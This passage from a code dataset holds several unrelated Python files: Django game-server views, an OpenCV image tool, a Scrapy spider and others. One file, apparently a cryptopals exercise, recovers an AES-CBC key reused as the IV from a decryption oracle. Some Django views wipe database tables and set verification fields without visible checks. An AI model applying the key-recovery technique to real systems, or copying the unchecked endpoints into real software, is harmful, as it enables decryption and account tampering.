updateUser.totalGamesXeri = totalGamesXeri\n updateUser.xeri = xeri\n updateUser.plakoto = plakoto\n updateUser.emailVerified = emailVerified\n updateUser.pUsername = pUsername\n updateUser.totalGamesPlakoto = totalGamesPlakoto\n updateUser.words = words\n updateUser.totalGamesWords = totalGamesWords\n updateUser.authData = authData\n updateUser.username = username\n updateUser.isMale = isMale\n updateUser.scoreFour = scoreFour\n updateUser.totalGamesAgonia = totalGamesAgonia\n updateUser.totalGamesScoreFour = totalGamesScoreFour\n updateUser.agonia = agonia\n updateUser.griniaris = griniaris\n updateUser.totalGamesGriniaris = totalGamesGriniaris\n updateUser.save()\n return HttpResponse(\"1\")\n\ndef gameStart(request):\n userId = request.GET.get(\"userId\", \" \")\n gameName = request.GET.get(\"gameName\", \" \")\n newLog = XLog(userId=userId, action=16, description = gameName)\n newLog.save()\n return HttpResponse(\"1\")\n\ndef GetJsonValue(json, key, defaultValue):\n if key in json:\n return json[key]\n return defaultValue\n\n\ndef parseToXDB(request):\n import json\n from pprint import pprint\n from datetime import datetime\n #clean tables...\n XPlayer.objects.all().delete()\n Feedback.objects.all().delete()\n Mute.objects.all().delete()\n FriendsList.objects.all().delete()\n with open('parse/_User.json') as data_file:\n data = json.load(data_file)\n for juser in data['results']:\n # print(juser)\n xuser = XPlayer(agonia= GetJsonValue(juser, \"agonia\", 0),\n fbId= juser[\"fbId\"],\n isMale= juser[\"isMale\"],\n objectId= juser[\"objectId\"],\n pUsername= juser[\"pUsername\"],\n username= juser[\"pUsername\"],\n plakoto= GetJsonValue(juser, \"plakoto\", 0),\n scoreFour= GetJsonValue(juser, \"scoreFour\", 0),\n totalGamesAgonia= GetJsonValue(juser, \"totalGamesAgonia\", 0),\n totalGamesPlakoto= GetJsonValue(juser, \"totalGamesPlakoto\", 0),\n totalGamesScoreFour= GetJsonValue(juser, \"totalGamesScoreFour\", 0),\n totalGamesWords= GetJsonValue(juser, \"totalGamesWords\", 0),\n totalGamesXeri= GetJsonValue(juser, \"totalGamesXeri\", 0),\n updatedAt= datetime.strptime(juser[\"updatedAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"),\n words= GetJsonValue(juser, \"words\", 0),\n createdAT= datetime.strptime(juser[\"createdAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n xeri= GetJsonValue(juser, \"xeri\", 0))\n xuser.save()\n with open('parse/Feedback.json') as data_file:\n data = json.load(data_file)\n for jfeedback in data['results']:\n # print(juser)\n xuser = XPlayer.objects.get(objectId=jfeedback['user']['objectId'])\n print (xuser.fbId)\n feedback = Feedback(createdAt= datetime.strptime(jfeedback[\"createdAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n text= jfeedback[\"text\"],#\"2016-10-21T16:39:53.927Z\"\n facebookId=xuser.fbId,\n user=xuser.fbId)\n feedback.save()\n\n with open('parse/FriendsList.json') as data_file:\n data = json.load(data_file)\n for jentry in data['results']:\n # print(juser)\n xuser = XPlayer.objects.get(objectId=jentry['user']['objectId'])\n xfriend = XPlayer.objects.get(objectId=jentry['friend']['objectId'])\n\n print (xuser.fbId)\n\n friendList = FriendsList(createdAt= datetime.strptime(jentry[\"createdAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n user= xuser.fbId,#\"2016-10-21T16:39:53.927Z\"\n fbId= xuser.fbId,#\"2016-10-21T16:39:53.927Z\"\n friend=xfriend.fbId)\n friendList.save()\n with open('parse/Mute.json') as data_file:\n data = json.load(data_file)\n for jentry in data['results']:\n # print(juser)\n xreporter = XPlayer.objects.get(objectId=jentry['reporter']['objectId'])\n xuser = XPlayer.objects.get(objectId=jentry['user']['objectId'])\n\n print (xuser.fbId)\n\n mute = Mute(createdAt= datetime.strptime(jentry[\"createdAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n user= xuser.fbId,\n reporter= xreporter.fbId)\n mute.save()\n\n return HttpResponse(\"1\")","sub_path":"projectx/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"587827149","text":"import string\nfrom base64 import b64encode\n\ndef uule(city):\n\tsecret_key = list(string.ascii_uppercase) + list(string.ascii_lowercase) + list(range(0,10)) + list('-') + list('_')\n\tcode = 'w+CAIQICI' + secret_key[len(city)%64] + b64encode(city)\n\tcode = code.strip('=')\n\treturn code\n\nprint (uule('Croydon,Victoria,Australia'))\n","sub_path":"uule.py","file_name":"uule.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"126161729","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport wagtail.wagtailcore.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0006_auto_20150930_1016'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='quote',\n name='quote',\n field=wagtail.wagtailcore.fields.RichTextField(),\n ),\n ]\n","sub_path":"cms/migrations/0007_auto_20150930_1017.py","file_name":"0007_auto_20150930_1017.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"80296449","text":"from cv2 import *\nimport numpy as np\nimport imutils\nfrom tkinter import messagebox\nfrom tkinter import *\n\n# https://www.pyimagesearch.com/2017/01/02/rotate-images-correctly-with-opencv-and-python/\n# https://docs.opencv.org/3.2.0/dd/d49/tutorial_py_contour_features.html\n# https://www.pyimagesearch.com/2017/06/19/image-difference-with-opencv-and-python/\n# https://stackoverflow.com/questions/43061143/extract-object-from-the-image-of-a-box-having-object\n# https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_core/py_image_arithmetics/py_image_arithmetics.html\n\n\nclass New_board_1:\n \"\"\"docstring for .\"\"\"\n\n def __init__(self):\n self.ban = 0\n self.ban_2 = 0 # to block the access to the image\n self.angle = 0 # Var to modify the angle of image and rotate\n self.rect = None # Var to draw a rectrangle\n self.imageROI = None # image Region Of Interest\n self.panel = np.zeros((100, 512, 3), np.uint8)\n cv2.namedWindow(\"panel\")\n cv2.namedWindow(\"full Contour\")\n cv2.createTrackbar(\"Th\", \"panel\", 230, 255, self.nothing)\n font = cv2.FONT_HERSHEY_SIMPLEX\n '''Put the text in a Windows below Trackbar'''\n cv2.putText(self.panel, 'Please move the trackbar until you only wrap the board.',\n (12, 15), font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'Hotkeys :', (12, 30), font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'C : take photo only of wrapper area.',\n (12, 45), font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'S : Save the wrapper area.', (12, 60),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'J and L : Rotate the image.', (12, 75),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'X : Load Image Again', (12, 90),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'Q : exit', (12, 110),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n # for load the images\n self.empty = None\n self.full = None\n self.full_c = None # full copy\n self.roi = None\n self.img = None\n # mask for remove background\n self.mask = None\n self.mask_2 = None\n self.mask_3 = None\n self.bgdModel = np.zeros((1, 65), np.float64)\n self.fgdModel = np.zeros((1, 65), np.float64)\n # convert to grayscale\n self.empty_g = None\n self.full_g = None\n self.diff = None\n self.diff_th = None\n self.median = None\n self.board = None\n self.contours = None\n self.x = None\n self.y = None\n self.w = None\n self.h = None\n self.rect = None\n self.box = None\n self.M = None\n self.cX = None\n self.cY = None\n self.key = None\n self.kernel = np.ones((15, 15), np.uint8)\n self.imageROI = None\n self.maskROI = None\n self.rotated = None\n\n def nothing(self, x):\n pass\n\n def get_th(self):\n return cv2.getTrackbarPos(\"Th\", \"panel\")\n\n def initialize_values(self, img_e, img_f):\n self.empty = img_e\n self.full = img_f\n self.full_c = self.full.copy()\n # save color copy for visualization\n self.mask_2 = np.zeros(self.full.shape[:2], np.uint8)\n # convert to grayscale\n self.empty_g = cv2.cvtColor(self.empty, cv2.COLOR_BGR2GRAY)\n self.full_g = cv2.cvtColor(self.full, cv2.COLOR_BGR2GRAY)\n # Now create a mask of logo and create its inverse mask also\n # blur to account for small camera movement\n # you could try if maybe different values will maybe\n # more reliable for broader cases\n self.empty_g = cv2.GaussianBlur(self.empty_g, (41, 41), 0)\n self.full_g = cv2.GaussianBlur(self.full_g, (41, 41), 0)\n # get the difference between full and empty box\n self.diff = self.full_g - self.empty_g\n cv2.imshow(\"panel\", self.panel)\n # inverse thresholding to change every pixel above 190\n # to black (that means without the bag)\n th = self.get_th()\n _, self.diff_th = cv2.threshold(self.diff, th, 255, 1)\n self.median = cv2.medianBlur(self.diff, 15)\n # combine the difference image and the inverse threshold\n # will give us just the bag\n self.board = cv2.bitwise_and(self.diff, self.diff_th, None)\n # threshold to get the mask instead of gray pixels\n _, self.board = cv2.threshold(self.board, 100, 255, 0)\n\n # dilate to account for the blurring in the beginning\n self.board = cv2.dilate(self.board, self.kernel, iterations=1)\n\n def get_contour(self):\n _, self.contours, _ = cv2.findContours(self.board, cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n self.contours = sorted(self.contours, key=cv2.contourArea, reverse=True)[:3]\n\n self.x, self.y, self.w, self.h = cv2.boundingRect(self.contours[0])\n\n def get_centroid(self):\n self.rect = cv2.minAreaRect(self.contours[0])\n self.box = cv2.boxPoints(self.rect)\n self.box = np.int0(self.box)\n self.mask = np.zeros(self.full_g.shape, dtype=\"uint8\")\n cv2.drawContours(self.mask, [self.box], -1, 255, -1)\n self.M = cv2.moments(self.contours[0])\n self.cX = int(self.M[\"m10\"] / self.M[\"m00\"])\n self.cY = int(self.M[\"m01\"] / self.M[\"m00\"])\n # put text and highlight the center\n cv2.circle(self.full_c, (self.cX, self.cY), 5, (255, 255, 0), -1)\n\n def draw_contours(self):\n cv2.drawContours(self.full_c, [self.contours[0]], -1, (0, 0, 255), 3) # red\n # cv2.rectangle(full_c, (x, y), (x+w, y+h), (0, 255, 0), 2) # green\n # cv2.drawContours(full_c, [box], 0, (255, 0, 0), 2) # blue\n\n def grab_the_board(self):\n cv2.grabCut(self.full_c, self.mask_2, (self.x, self.y, self.w, self.h),\n self.bgdModel, self.fgdModel, 5, cv2.GC_INIT_WITH_RECT)\n self.mask_3 = np.where((self.mask_2 == 2) | (self.mask_2 == 0), 0, 1).astype(\"uint8\")\n self.img = self.full*self.mask_3[:, :, np.newaxis]\n #cv2.imshow(\"R\", self.img)\n self.imageROI = self.img[self.y:self.y + self.h, self.x:self.x + self.w]\n self.maskROI = self.mask_2[self.y:self.y + self.h, self.x:self.x + self.w]\n self.imageROI = cv2.bitwise_and(self.imageROI, self.imageROI,\n mask=self.maskROI)\n\n def rotated_img(self):\n self.rotated = imutils.rotate(self.imageROI, self.angle)\n\n\ndef get(root, dst, file):\n New_board = New_board_1() # initialize values\n # if the image was close the break the loop\n while cv2.getWindowProperty('panel', 0) >= 0:\n New_board.initialize_values(cv2.imread(\"Images/Rasp_Arduino/back_2.jpg\"),\n cv2.imread(\"Images/Rasp_Arduino/Comp_35.jpg\"))\n # save color copy for visualization\n # find contours, sort and draw the biggest one\n try:\n if New_board.ban < New_board.get_th():\n # Get the contour values\n New_board.get_contour()\n # draw contours\n New_board.draw_contours()\n # Get the centroid and draw the centroid\n New_board.get_centroid()\n except:\n # print(\"Bandera\")\n New_board.ban = New_board.get_th()\n\n New_board.key = cv2.waitKey(10) & 0xFF\n if New_board.key == ord('l') and New_board.angle >= 5:\n print(\"Rotate \", New_board.angle)\n New_board.angle -= 5\n New_board.rotated_img()\n cv2.imshow(\"Rotated (Problematic)\", New_board.rotated)\n if New_board.key == ord('j') and New_board.angle <= 355:\n print(\"Rotate \", New_board.angle)\n New_board.angle += 5\n New_board.rotated_img()\n cv2.imshow(\"Rotated (Problematic)\", New_board.rotated)\n\n if New_board.key == ord('c'):\n # cv2.destroyAllWindows()\n cv2.destroyWindow(\"full Contour\")\n New_board.grab_the_board()\n New_board.rotated_img()\n cv2.imshow(\"Rotated (Problematic)\", New_board.rotated)\n cv2.waitKey(0)\n New_board.ban_2 = 1\n\n if New_board.key == ord('s'):\n #cv2.imwrite(dst+\".jpg\", New_board.roi)\n New_board.ban_2 = 1\n print(dst)\n cv2.imwrite(dst+\"/\"+file+\".jpg\", New_board.rotated)\n #cv2.imwrite('Images/cap_video2.png', frame)\n # cv2.destroyWindow('ROI')\n messagebox.showinfo('Save completed', \"The file \"+file+\".jpg is saved successfully\")\n cv2.destroyAllWindows()\n\n break\n if New_board.key == ord(\"x\"):\n cv2.destroyAllWindows()\n New_board.__init__()\n continue\n if New_board.key == ord(\"q\"):\n cv2.destroyAllWindows()\n break\n\n if New_board.ban_2 == 0:\n #cv2.imshow(\"full\", New_board.full)\n cv2.imshow(\"full Contour\", New_board.full_c)\n\n cv2.destroyAllWindows()\n","sub_path":"Project_1/get_foreground.py","file_name":"get_foreground.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118475423","text":"import random \nimport string\nimport sys\nfrom Crypto.Cipher import AES\n\ndef find_repeating_blocks(cip: bytes) -> int:\n chunk_tex = chunks(cip,16)\n repeat = len(chunk_tex) - len(set(chunk_tex))\n return(repeat)\n\n\ndef encrypt_aes_ecb(text:bytes,key:bytes)->bytes:\n \"\"\" takes a bunch of text and splits it in chunks, pads it in \n pkcs (#PKCS7)\n param1 : text to be encrypted (bytes)\n key : key to encrypt (bytes)\n\n r_type : cipher text (bytes)\n\n \"\"\"\n\n chunk_text = chunks(text,16)\n padded_chunks = padded_text(chunk_text)\n cipher_text = b''\n for i in padded_chunks:\n \n cipher = encrypt_128_aes_ecb(i,key)\n cipher_text += cipher\n return cipher_text \n\ndef decrypt_aes_ecb(cipher_text:bytes,key:bytes)->bytes:\n \"\"\" takes a bunch of cipher text and splits it in chunks and\n returns plain text\n param1 : text to be encrypted (bytes)\n key : key to encrypt (bytes)\n\n r_type : cipher text (bytes)\n\n \"\"\"\n\n chunk_text = chunks(cipher_text,16)\n plain_text = b''\n for i in chunk_text:\n '''\n print(\"i\",i)\n print(\"previous\",previous_chunk)\n print(\"\")\n '''\n plain = decrypt_128_aes_ecb(i,key)\n plain_text = plain_text + plain\n plain_text = unpad_valid_pkcs7(plain_text)\n return plain_text\n\n\ndef unpad_valid_pkcs7(buff):\n '''\n param1: takes a buffer of text\n return: returns unpadded plain text\n if padding is not vaild then it returns Padding Error\n TO WORK THIS DOESN\"T WORK FOR UNPADED TEXT\n '''\n if len(buff) % 16 != 0:\n return('PaddingError')\n last_byte = buff[-1]\n if last_byte > 16:\n return(\"PaddingError\")\n for i in range(last_byte, 0, -1):\n if buff[-i] != last_byte:\n return(\"PaddingError\")\n return buff[:-last_byte] \n\ndef encrypt_128_aes_cbc(text:bytes,key:bytes,iv:bytes)->bytes:\n \"\"\"function to take plaintext and encrypt it using aes 128 cbc \n\n param1 -> plaintext\n param2 -> key to encrypt data\n iv -> initilization vector\n\n return cipher text \n\n \"\"\"\n chunk_text = chunks(text,16)\n padded_chunks = padded_text(chunk_text)\n previous_chunk = iv\n cipher_text = b''\n for i in padded_chunks:\n xor_text = xor_chunks(i,previous_chunk)\n cipher = encrypt_128_aes_ecb(xor_text,key)\n previous_chunk = cipher\n cipher_text += cipher\n return cipher_text\n\n\n\ndef decrypt_128_aes_cbc(cipher_text,key,iv):\n chunk_text = chunks(cipher_text,16)\n previous_chunk = iv\n plain_text = b''\n for i in chunk_text:\n '''\n print(\"i\",i)\n print(\"previous\",previous_chunk)\n print(\"\")\n '''\n plain = decrypt_128_aes_ecb(i,key)\n xor_text = xor_chunks(plain,previous_chunk)\n plain_text = plain_text + xor_text\n previous_chunk = i\n return plain_text\n\n\n\n\n \n \ndef padding(msg:bytes, bsize:int)->bytes:\n \"\"\" pad the message to the blocksize using the PKCS#7 padding scheme \n :param msg -> message to pad (bytes)\n :param bsize -> the block size to use (int)\n\n return padded message (bytes)\n \"\"\"\n\n if bsize<2 and bsize>255:\n raise ValueError\n\n msg_len = len(msg)\n pad_size = bsize - (msg_len % bsize)\n pad_val = pad_size.to_bytes(1, sys.byteorder, signed=False)\n padding = pad_val * pad_size\n #print(padding)\n #print(msg)\n return(msg+padding)\n\n\n\n\n\ndef randomkey(length:int)->bytes:\n \"\"\"\n function returns a random key of given length\n param1: length of key (int)\n \n return: key (bytes)\n \"\"\"\n key = b''\n for i in range(length):\n j = random.randint(1,255)\n key = key + bytes([j])\n return key\n\n\n\ndef padded_text(chunk_text:bytes)->bytes:\n \n padded_chunks = []\n for i in chunk_text:\n if len(i) != 16:\n padded_chunks.append(padding(i,16))\n else:\n padded_chunks.append(i)\n\n return padded_chunks\n\ndef xor_chunks(text:bytes,p_text:bytes)->bytes:\n return bytes([_a ^ _b for _a, _b in zip(text, p_text)])\n\n\n\ndef encrypt_128_aes_ecb(text:bytes,key:bytes)->bytes:\n cipher = AES.new(key,AES.MODE_ECB)\n cipher_text = cipher.encrypt(text)\n return cipher_text\n\n\ndef decrypt_128_aes_ecb(text:bytes,key:bytes)->bytes:\n cipher = AES.new(key,AES.MODE_ECB)\n plaintext = cipher.decrypt(text)\n return plaintext\n\n\n\ndef chunks(text:bytes,blocksize:int)->bytes:\n \"\"\"\n pram1: whole encrypted messages \n pram2: amount of chunks needed \n\n return array of chunks of data\n \"\"\"\n chunk_data = b''\n chunks = []\n for i in range(0,len(text),blocksize):\n chunk_data = text[i:i+blocksize] \n chunks.append(chunk_data)\n return chunks\n\n\n\n\ndef strip_pdcks_7(data:bytes,bsize:int)->bytes:\n if len(data) % bsize != 0:\n return(0)\n\n padding_len = int(data[-1])\n \n if padding_len > 16:\n return(data)\n\n for i in range(bsize-padding_len,len(data)):\n \n if data[i] != data[-1]:\n return(data)\n\n return(data[:bsize-padding_len])\n\n\n\n\ndef encryption_oracle(text:str,key:bytes)->bytes:\n \"\"\" takes a bunch of text, adds a bunch of additional \n text, generates a random key and initilization\n vector. then randomly encrypts it in ebc or cbc\n\n\n param1: text to be encrypted (bytes)\n key: key to encrypt and also act as iv\n\n rtype: encrypted text (bytes)\n \"\"\"\n cipher = encrypt_128_aes_cbc(text,key,key)\n return cipher\n\ndef decryption_oracle(cipher:bytes)->bytes:\n \"\"\"\n decrypts a given cipher text encrypted in cbc and also strips out the padding \n key and iv in global variable \n \"\"\"\n plaintext = decrypt_128_aes_cbc(cipher,key,key)\n try:\n plaintext.decode(encoding='ascii')\n except UnicodeDecodeError:\n return plaintext\n \ndef encryption_breaker():\n c1 = randomkey(16)\n cipher = decryption_oracle(c1+b'\\x00'*16+c1)\n ciphers = [cipher[i:i+16] for i in range(0,len(cipher),16)]\n found_key = xor_chunks(ciphers[2],ciphers[0])\n if found_key == key:\n print('found key')\n\nif __name__ == '__main__':\n key = randomkey(16)\n encryption_breaker()\n \n","sub_path":"set4/challenge27/set2_16.py","file_name":"set2_16.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597904800","text":"n = int(input())\n\narr = []\ns = 0\nfor i in range(n):\n arr += [int(input())]\n s += arr[i]\n\narr.sort()\narr = arr[::-1]\ns -= arr[0]\n\nif arr[0] >= s: print(s)\nelse:\n print((arr[0] + s)//2)\n","sub_path":"13000/13754/13754.py3.py","file_name":"13754.py3.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362644417","text":"import socket\nimport threading\nimport subprocess\nimport struct\nimport os\n\n################################################################################\n##\n## ftClientListener class\n##\n## CS 372 - Project 2 - Jeremy Prater\n##\n\nclass ftClientListener(threading.Thread):\n def __init__(self, clientPort, command, file):\n # Setup local variables from input\n threading.Thread.__init__(self);\n self.clientPort = clientPort\n self.command = command\n self.file = file\n\n def GetData (self):\n # Get data from socket until it is empty or closed.\n payload = bytearray();\n while True:\n data = self.ftConnection.recv(1024);\n if not data:\n return payload\n payload.extend(data)\n\n def run(self):\n # Startup the socket to listen for server response.\n print(\"ftclient listener thread on port {}\".format(self.clientPort))\n self.ftSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.ftSocket.bind ((socket.gethostname(), self.clientPort))\n self.ftSocket.settimeout(1)\n self.ftSocket.listen(1)\n self.listening = True\n self.timeoutCounter = 0;\n print ('Waiting for accept on {}'.format(self.clientPort))\n\n # Client listener loop\n while self.listening:\n try:\n # Wait for new connection\n self.ftConnection, self.ftAddress = self.ftSocket.accept()\n print ('New data connection from {}'.format(self.ftAddress))\n data = self.GetData();\n # Send response payload length...\n if self.command == 0:\n # list command\n print (\"{}\".format(data.decode('ASCII')))\n elif self.command == 1:\n # get file command\n if os.path.isfile(self.file):\n print (\"File {} exists in local directory Not overwriting!\".format(self.file))\n else:\n if len(data) > 0:\n outFile = open(self.file, 'wb')\n outFile.write(data)\n outFile.close()\n print (\"Wrote {} bytes to file {}\".format(len(data), self.file))\n else:\n print (\"File {} not found on server.\".format(self.file))\n\n else:\n self.ftConnection.send(0);\n self.listening = False\n\n # Socket time out to re-run listener loop and check for exit signal\n except socket.timeout as t:\n self.timeoutCounter += 1\n if self.timeoutCounter < 5:\n pass\n else:\n raise socket.timeout\n\n # Shutdown client listener\n self.ftSocket.close()\n print(\"ftclient closing port {}\".format(self.clientPort))","sub_path":"CS_372/project2/client/ftClientListener.py","file_name":"ftClientListener.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316263135","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nfrom numpy.random import random\nfrom noise import pnoise1\nimport IPython\n\nfrom cairo_utils.dcel.constants import VertE, EdgeE, FaceE\nfrom cairo_utils.constants import QUARTERPI, TWOPI\nfrom cairo_utils.dcel.Line import Line\nimport cairo_utils as utils\nfrom . import heightmap\nfrom .operatorTemplate import OperatorTemplate\nimport logging as root_logger\nlogging = root_logger.getLogger(__name__)\n\nINTERPOLATION = 'cubic'\n\nclass RiverOperator(OperatorTemplate):\n \"\"\" An operator to create a river \"\"\"\n \n def __init__(self, subdiv, octaves=1, width_min=0.03, width_max=0.08,\n deviance=0.2, repeats=3, tolerance=0.1, max_rot_delta=0.1):\n #the number of subdivisions of the main river line\n self.subdiv = subdiv\n #octaves of the perlin noise\n self.octaves = octaves\n self.deviance = deviance\n self.repeats = repeats\n #the proportion of internal steps that it takes before vector correction\n self.tolerance = tolerance\n \n self.width_range = np.array([width_min, width_max])\n\n #Required:\n self.delta = []\n self.dc = None\n self.i = None\n \n def is_oneshot(self):\n return True\n\n def __enter__(self):\n logging.info(\"Entering RiverTick Context\")\n \n \n def __exit__(self, type, value, traceback):\n logging.info(\"Exiting RiverTick Context\")\n if value is not None:\n logging.warning(\"Unwinding\")\n self.unwind()\n self.dc = None\n self.i = None\n self.delta = []\n #if exiting with an error,\n #undo the operations\n\n def __call__(self, draw=True, override=False):\n self.delta = []\n\n #pick a start and end point on two opposite edges \n bbox_min = self.dc.bbox[0]\n bbox_max = self.dc.bbox[2]\n mid_way = int(self.dc.bbox[2] * 0.5)\n line_points = None\n #choose a pair of sides\n if random() > 0.5:\n line_points = np.array([[mid_way,bbox_max],[mid_way, bbox_min]])\n else:\n line_points = np.array([[bbox_min, mid_way],[bbox_max, mid_way]])\n the_line = Line.newLine(line_points)\n subdivs = the_line.subdivide(self.subdiv)\n bisector = utils.math.get_bisector(*line_points)\n\n target = line_points[1]\n current = line_points[0]\n\n halfPoints = int((self.subdiv + 2) * 0.5)\n easing = pow(np.cos(QUARTERPI * np.linspace(-1, 1, halfPoints)), 3.5).reshape((-1,1))\n rotAmnt = np.array([(TWOPI * 1.3) * pnoise1(x * 0.001, octaves=self.octaves, base=int(random()*1000)) for x in range(halfPoints)])\n rotAmnt -= rotAmnt.mean()\n rot = np.column_stack((np.cos(rotAmnt), np.sin(rotAmnt))) * easing\n smoothedRot = utils.math._interpolate(rot, halfPoints * 2)\n devianceAmnt = self.deviance * self.dc.bbox[2]\n final_points = subdivs + (smoothedRot * devianceAmnt)\n \n\n #Create the lines\n if not draw:\n return self.delta\n\n edges = self.dc.createPath(final_points, edata={'river':True,\n EdgeE.WIDTH: 1})\n self.delta += edges\n return self.delta\n\n def unwind(self):\n self.dc.purge(targets=self.delta)\n self.delta = []\n \n","sub_path":"citygen/riverOperator.py","file_name":"riverOperator.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"200645194","text":"import scrapy\nimport unicodedata\n\nfrom scrapy.http import Request\n\nfrom news_scrapping.items import NewsScrappingItem\n\n\n\nclass EkantipurSpider(scrapy.Spider):\n name = 'ekantipur'\n allowed_domains = ['ekantipur.com']\n start_urls = ['http://ekantipur.com/']\n\n def parse(self, response):\n\n navigation_extracted_links = response.xpath('//*[@id=\"header\"]/div[1]/nav/div/div[2]/div/ul/li/a/@href').getall()\n navigation_links = list(filter(lambda link: 'https://ekantipur.com/' in link, navigation_extracted_links))\n for link in navigation_links:\n yield Request(link, callback=self.parse_link, dont_filter=True)\n \n def parse_link(self,response):\n\n item = NewsScrappingItem()\n news_category = response.url.split('https://ekantipur.com/')[1]\n base_link = response.xpath('//div[contains(@class, \"col-xs-10 col-sm-10 col-md-10\")]//article')\n for response in base_link:\n category = news_category\n title = response.xpath('div[contains(@class,\"teaser offset\")]/h2/a/text()').get()\n link = self.start_urls[0]+response.xpath('div[contains(@class,\"teaser offset\")]/h2/a/@href').get()\n description = response.xpath('div[contains(@class,\"teaser offset\")]/p/text()').get()\n images_link = response.xpath('div[contains(@class,\"image\")]/figure/a/img/@data-src').get()\n\n item['category'] = category\n item['title'] = unicodedata.normalize(\"NFKD\",title)\n item['link'] = link\n item['description'] = unicodedata.normalize(\"NFKD\",description)\n item['images_link'] = images_link\n\n yield item\n \n","sub_path":"news_scrapping/news_scrapping/spiders/ekantipur.py","file_name":"ekantipur.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29392452","text":"from typing import Optional, Sequence\n\nfrom pytorch_lightning import LightningDataModule\nfrom torch.utils.data import ConcatDataset, DataLoader, Dataset, random_split\nfrom torchvision.datasets import MNIST\nfrom torchvision.transforms import transforms\nfrom torchvision.transforms import RandomHorizontalFlip, RandomVerticalFlip\n\nfrom ..datasets.image_dataset import DIV2KDataset, DIV2KDatasetPaired\nfrom ..datasets.sr_dataset import ContinuesSRDataset\nfrom ..datasets.implicit_image_dataset import ImplicitImageDataset\n\nfrom ..utils.transforms import RandomDFlip\n\nclass DIV2KDataModule(LightningDataModule):\n \"\"\"\n LightningDataModule for DIV2K dataset, only\n\n https://data.vision.ee.ethz.ch/cvl/DIV2K/\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n\n self.data_dir = kwargs[\"data_dir\"]\n\n self.train_dataloader_params = kwargs[\"train_dataloader_params\"]\n self.val_dataloader_params = kwargs[\"val_dataloader_params\"]\n self.test_dataloader_params = kwargs[\"test_dataloader_params\"]\n\n # self.batch_size = kwargs[\"batch_size\"]\n # self.num_workers = kwargs[\"num_workers\"]\n # self.pin_memory = kwargs[\"pin_memory\"]\n\n self.inp_size = kwargs[\"inp_size\"]\n self.scale_range = kwargs[\"scale_range\"]\n self.sample_q = kwargs[\"sample_q\"]\n\n self.transforms = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n )\n\n # self.dims is returned when you call datamodule.size()\n # self.dims = (1, 28, 28)\n\n self.data_train: Optional[Dataset] = None\n self.data_val: Optional[Dataset] = None\n\n def prepare_data(self):\n \"\"\"Download data if needed. This method is called only from a single GPU.\n Do not use it to assign state (self.x = y).\"\"\"\n # MNIST(self.data_dir, train=True, download=True)\n # MNIST(self.data_dir, train=False, download=True)\n # Can write a download program to replace dowload \n pass\n\n\n def setup(self, stage=None):\n \"\"\"Load data. Set variables: self.data_train, self.data_val.\"\"\"\n\n # 1. augment\n augument_transforms = transforms.Compose([RandomHorizontalFlip(p=0.5), RandomVerticalFlip(p=0.5), RandomDFlip(p=0.5)])\n\n # train dataset\n trainset = DIV2KDataset(root=self.data_dir, train= True, transform=transforms.Compose([self.transforms, augument_transforms]))\n trainset = ContinuesSRDataset(dataset=trainset, inp_size=self.inp_size, scale_range=self.scale_range)\n trainset = ImplicitImageDataset(dataset=trainset, sample_q=self.sample_q)\n\n # validation dataset\n valset = DIV2KDataset(root=self.data_dir, train=False, transform=self.transforms)\n valset = ContinuesSRDataset(dataset=valset, inp_size=self.inp_size, scale_range=self.scale_range)\n valset = ImplicitImageDataset(dataset=valset, sample_q=self.sample_q)\n\n self.data_train, self.data_val = trainset, valset\n\n def train_dataloader(self):\n return DataLoader(\n dataset=self.data_train,\n batch_size=self.train_dataloader_params.batch_size,\n num_workers=self.train_dataloader_params.num_workers,\n pin_memory=self.train_dataloader_params.pin_memory,\n 